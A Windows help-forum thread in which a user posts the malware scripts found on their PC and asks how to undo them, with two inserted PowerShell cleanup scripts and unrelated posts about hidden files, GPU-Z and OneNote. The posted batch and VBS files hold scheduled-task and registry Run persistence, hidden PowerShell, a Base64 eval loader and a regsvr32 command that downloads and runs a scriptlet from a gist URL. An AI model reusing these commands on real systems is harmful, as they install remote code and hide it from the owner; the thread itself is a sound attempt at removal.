Windows 10: How to reverse what a virus changed and stop it from opening in startup.

Discuss and support How to reverse what a virus changed and stop it from opening in startup. in AntiVirus, Firewalls and System Security to solve the problem; After getting stressed because a virus didn't stop opening a cmd every time I closed it, I started checking the files from the program that installed... Discussion in 'AntiVirus, Firewalls and System Security' started by Zerlingg, Jun 18, 2019.

  1. Zerlingg Win User

    How to reverse what a virus changed and stop it from opening in startup.


    After getting stressed because a virus didn't stop opening a cmd every time I closed it, I started checking the files from the program that installed it (because no antivirus has fixed this :( ) and then found these things:


    The first thing that opens is a launcher.bat that gets opened when trying to run the program, and this is what it does:

    cd .. && cd data && cd source && cd data1 && cd data2

    xcopy /s /Y data3 C:\Users\Public\Music /E /H

    cd data3 && cd bin

    schtasks /create /tn "OneDrive32" /tr "cmd /c start /min C:\Users\Public\Music\bin\java.bat" /sc minute /mo 2 /F

    schtasks /create /tn "WindowsPhotos" /tr "cmd /c start /min C:\Users\Public\Music\bin\ghost.exe" /sc minute /mo 33 /F

    schtasks /create /tn "Defender" /tr "regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/sparta34/59b82973cbbabe32c7d195f9cf8e8869/raw/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll" /sc minute /mo 32 /F

    wscript.exe service.vbs && wscript.exe java.vbs

    start ghost.exe

    attrib +h C:\Users\Public\Music

    exit



    It changes "Defender", "WindowsPhotos" and "OneDrive32". Also it starts running that "ghost.exe", and installs other things like code from GitHub. I want to revert all of this so it stops the virus and the cmds; also, let me show you other files I found in the C:\Users\Public\Music\bin\ directory that it hides (thankfully I found all of this because I always have hidden files set to not hidden).


    java.vbs runs:

    const CONSOLE_HIDE=0

    const CONSOLE_SHOW=1

    const CMD_WAIT=true



    set O = CreateObject("Wscript.Shell")

    D="HKCU\jaava"

    H="cmd /c start /min C:\Users\Public\Music\bin\java.bat"

    O.regwrite D,H,"REG_SZ"

    O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cleaner", U & "cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'jaava').jaava;cmd /c $y" & Chrw(34) , "REG_SZ"

    O.Run "powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'jaava').jaava;cmd /c $y" & Chrw(34),0,false



    I took a look at Java.bat too:

    cd C:\Users\Public\Music\bin && start /min jjs.bat && exit


    And jjs.bat:

    echo eval(new java.lang.String(java.util.Base64.decoder.decode(' '))); | powershell.exe -WindowStyle Hidden C:\Users\Public\Music\bin\svchost.exe


    (inside the (' ') goes a really long text of random letters and numbers, but I don't want to put it, I don't think it will help with anything)



    I also checked Service.vbs:


    const CONSOLE_HIDE=0

    const CONSOLE_SHOW=1

    const CMD_WAIT=true



    set O = CreateObject("Wscript.Shell")

    D="HKCU\alien34"

    H="regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/sparta34/59b82973cbbabe32c7d195f9cf8e8869/raw/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll"

    O.regwrite D,H,"REG_SZ"

    O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive32", U & "cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y" & Chrw(34) , "REG_SZ"

    O.Run "powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y" & Chrw(34),0,false



    If you need anything else to check, just tell me; I will post in a comment if I find more things

    :)
     
    Zerlingg, Jun 18, 2019
    #1
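The scripts in the post above set up three persistence points that all have to go together: the scheduled tasks (OneDrive32, WindowsPhotos, Defender), the HKCU Run values (cleaner, OneDrive32) and the staging values under the HKCU root (jaava, alien34) that the Run entries read their real command line from. Note also that the "Defender" task does not depend on 64.dll alone: regsvr32 /i:...,https://... fetches the scriptlet from the gist URL every 32 minutes, so the task itself must be removed. The following PowerShell is an added example, not code from the original post or from the poster; the task names, registry value names and paths are taken from the posted scripts, while the $Apply switch and the quarantine folder are my own assumptions. Run it in an elevated PowerShell as the infected user: it lists everything first and only removes with $Apply set to $true.

```powershell
# Added example (not from the original post): list, then remove, the persistence that the
# posted launcher.bat / java.vbs / service.vbs created. Run elevated, as the infected user.
$Apply = $false          # review the listing first, then set to $true and run again

# Names and paths exactly as they appear in the posted scripts.
$TaskNames   = 'OneDrive32', 'WindowsPhotos', 'Defender'
$RunKey      = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$RunValues   = 'cleaner', 'OneDrive32'     # Run values written by java.vbs / service.vbs
$StageValues = 'jaava', 'alien34'          # values under the HKCU root holding the real commands
$DropDir     = 'C:\Users\Public\Music'     # xcopy target; the scripts live in $DropDir\bin

Write-Host '== Scheduled tasks =='
foreach ($t in Get-ScheduledTask | Where-Object { $_.TaskName -in $TaskNames }) {
    foreach ($a in $t.Actions) {
        '{0}{1}: {2} {3}' -f $t.TaskPath, $t.TaskName, $a.Execute, $a.Arguments
    }
}

Write-Host '== Registry =='
foreach ($v in $RunValues) {
    $val = (Get-ItemProperty -Path $RunKey -Name $v -ErrorAction SilentlyContinue).$v
    if ($val) { "Run\$v = $val" }
}
foreach ($v in $StageValues) {
    $val = (Get-ItemProperty -Path 'HKCU:\' -Name $v -ErrorAction SilentlyContinue).$v
    if ($val) { "HKCU\$v = $val" }
}

Write-Host '== Running processes that reference the drop directory =='
# Matching on the command line also catches the cmd/powershell/regsvr32 wrappers, not just
# ghost.exe and the look-alike svchost.exe in $DropDir\bin (the real one is in System32).
$procs = Get-CimInstance Win32_Process |
    Where-Object { $_.CommandLine -like "*$DropDir*" -and $_.ProcessId -ne $PID }
$procs | ForEach-Object { '{0,6} {1}' -f $_.ProcessId, $_.CommandLine }

if (-not $Apply) { Write-Host 'Listing only. Set $Apply = $true to remove.'; return }

# 1. Stop the processes first so nothing re-creates the tasks/values while we delete them.
$procs | ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }

# 2. Scheduled tasks (-Confirm:$false suppresses the per-task prompt).
Get-ScheduledTask | Where-Object { $_.TaskName -in $TaskNames } |
    Unregister-ScheduledTask -Confirm:$false

# 3. Registry: the Run entries and the staging values they read from.
foreach ($v in $RunValues)   { Remove-ItemProperty -Path $RunKey  -Name $v -ErrorAction SilentlyContinue }
foreach ($v in $StageValues) { Remove-ItemProperty -Path 'HKCU:\' -Name $v -ErrorAction SilentlyContinue }

# 4. Quarantine the dropped files rather than deleting them (so they can still be scanned
#    or submitted), and undo the +h the launcher put on the Music folder.
#    Assumption: a quarantine folder under the user profile is acceptable.
$Quarantine = Join-Path $env:USERPROFILE ('quarantine_' + (Get-Date -Format 'yyyyMMdd_HHmmss'))
New-Item -ItemType Directory -Path $Quarantine -Force | Out-Null
if (Test-Path -LiteralPath "$DropDir\bin") {
    Move-Item -LiteralPath "$DropDir\bin" -Destination $Quarantine -Force
}
attrib -h $DropDir
Write-Host "Done. Quarantined to $Quarantine. Re-run with `$Apply = `$false: every section should be empty."
```

Two caveats. First, the launcher xcopy'd the whole data3 tree into C:\Users\Public\Music, and the post only lists what is under bin, so look through the rest of that folder by hand before assuming it is clean. Second, this only undoes what the posted scripts do; the script the "Defender" task downloads and the Base64 payload in jjs.bat are not shown, so anything they installed still needs a proper scan.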

  2. Virus change reversal

    I got some sort of virus on Tuesday. I ran a few virus scanners in safe mode and they caught about 14 different bugs/registry hacks, so I think it's all quarantined. One of the changes the virus(es) made was that every file and folder is set as "hidden". Is there a registry setting I can change to fix this?
     
    demonbrawn, Jun 18, 2019
    #2
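The "everything is hidden" symptom is not a registry setting: Hidden is an attribute stored on each file and folder, so the Explorer option to show hidden files only hides the symptom and the attribute has to be cleared item by item. The function below is an added example, not from anyone in the thread. It skips anything that also carries the System attribute (desktop.ini, NTUSER.DAT, $RECYCLE.BIN and the like, which Windows hides legitimately) and, as an assumption on my part, the AppData folders; it reports by default and only changes attributes with -Apply.

```powershell
# Added example (not from the thread): clear the Hidden attribute that malware set on
# ordinary files and folders, leaving legitimately hidden items alone.
function Restore-HiddenFiles {
    param(
        [Parameter(Mandatory)][string]$Root,
        [switch]$Apply                            # default is report-only
    )
    $Hidden = [IO.FileAttributes]::Hidden
    $System = [IO.FileAttributes]::System

    # Assumption: these are hidden by Windows itself and should stay that way.
    $KeepHiddenNames = 'desktop.ini', 'Thumbs.db', 'ntuser.ini'
    $KeepHiddenDirs  = '\\(AppData|Application Data)\\'    # regex on the full path

    $items = Get-ChildItem -LiteralPath $Root -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object {
            (($_.Attributes -band $Hidden) -ne 0) -and     # currently hidden
            (($_.Attributes -band $System) -eq 0) -and     # not a system item
            ($KeepHiddenNames -notcontains $_.Name) -and
            ($_.FullName -notmatch $KeepHiddenDirs)
        }

    foreach ($i in $items) {
        if ($Apply) { $i.Attributes = $i.Attributes -bxor $Hidden }   # flip Hidden off
        $i.FullName
    }
    $verb = if ($Apply) { 'unhidden' } else { 'would be unhidden (re-run with -Apply)' }
    '{0} item(s) {1}' -f @($items).Count, $verb
}

Restore-HiddenFiles -Root "$env:USERPROFILE"          # preview
# Restore-HiddenFiles -Root "$env:USERPROFILE" -Apply  # then apply
```

Run it as the affected user for the profile, or from an elevated prompt with -Root 'C:\' if the whole drive was touched; in that case read the preview carefully, because anything else Windows hides without the System flag will show up in the list.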
  3. Avedis53 Win User
    Can't get GPU-Z to start with Windows 8.1 startup

    I'm not sure how to do that. Could you list the steps for a noob?
     
    Avedis53, Jun 18, 2019
    #3
  4. How to reverse what a virus changed and stop it from opening in startup.

    OneNote 2016 opening on startup

    Hi,

    In order to turn off or disable OneNote 2016 at startup, we suggest that you follow the steps below:

    • Right-click on the Taskbar, and select Task Manager.
    • On the bottom right of the Task Manager window, click the drop-down arrow to open More details.
    • Click the Startup tab. This tab shows the programs that are enabled on Startup.
    • Right-click OneNote 2016, and click Disable.
    • Click File, then Exit.
    • You may then restart your computer for the changes to take effect.

    Let us know if you need further help.

    Regards.
     
    Vanessa Yar, Jun 18, 2019
    #4